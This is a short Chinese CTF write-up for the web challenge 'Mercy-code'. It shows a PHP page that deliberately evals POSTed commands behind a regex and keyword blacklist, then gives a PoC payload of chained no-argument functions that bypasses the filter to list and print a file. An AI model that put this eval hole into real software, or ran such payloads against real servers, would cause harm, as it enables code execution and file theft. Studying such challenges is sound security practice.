2022 i春秋-春季赛 web- Mercy-code

<?php
highlight_file(__FILE__);
if ($_POST['cmd']) {
    $cmd = $_POST['cmd'];
    if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) {
        if (preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log|var_dump|pos|current|array|time|se|ord/i', $cmd)) {
            die('What are you thinking?');
        } else {
            eval($cmd);
        }
    } else {
        die('Please calm down');
    }
}

poc

cmd=show_source(end(scandir(next(each(str_split(spl_autoload_extensions()))))));

spl_autoload_extensions函数见新春欢乐赛

通过这个函数取小数点即可（zend_version也可以）